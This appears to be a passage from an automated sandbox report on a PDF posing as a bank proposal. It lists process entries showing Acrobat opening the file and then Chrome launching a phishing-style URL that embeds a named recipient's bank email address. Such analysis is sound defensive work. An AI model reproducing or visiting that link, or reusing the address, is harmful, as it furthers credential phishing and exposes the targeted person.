                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Updated_Proposal_20241113_pdf_banca.pdf"
                                            Imagebase:0x7ff6bc1b0000
                                            File size:5'641'176 bytes
                                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:1
                                            Start time:04:28:08
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                            Imagebase:0x7ff74bb60000
                                            File size:3'581'912 bytes
                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:04:28:08
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1384,i,12974326492354929419,14040274795783035196,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                            Imagebase:0x7ff74bb60000
                                            File size:3'581'912 bytes
                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:04:28:32
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it"
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:10
                                            Start time:04:28:32
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1920,i,5273971204665831357,13377854627728883333,262144 /prefetch:8
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            No disassembly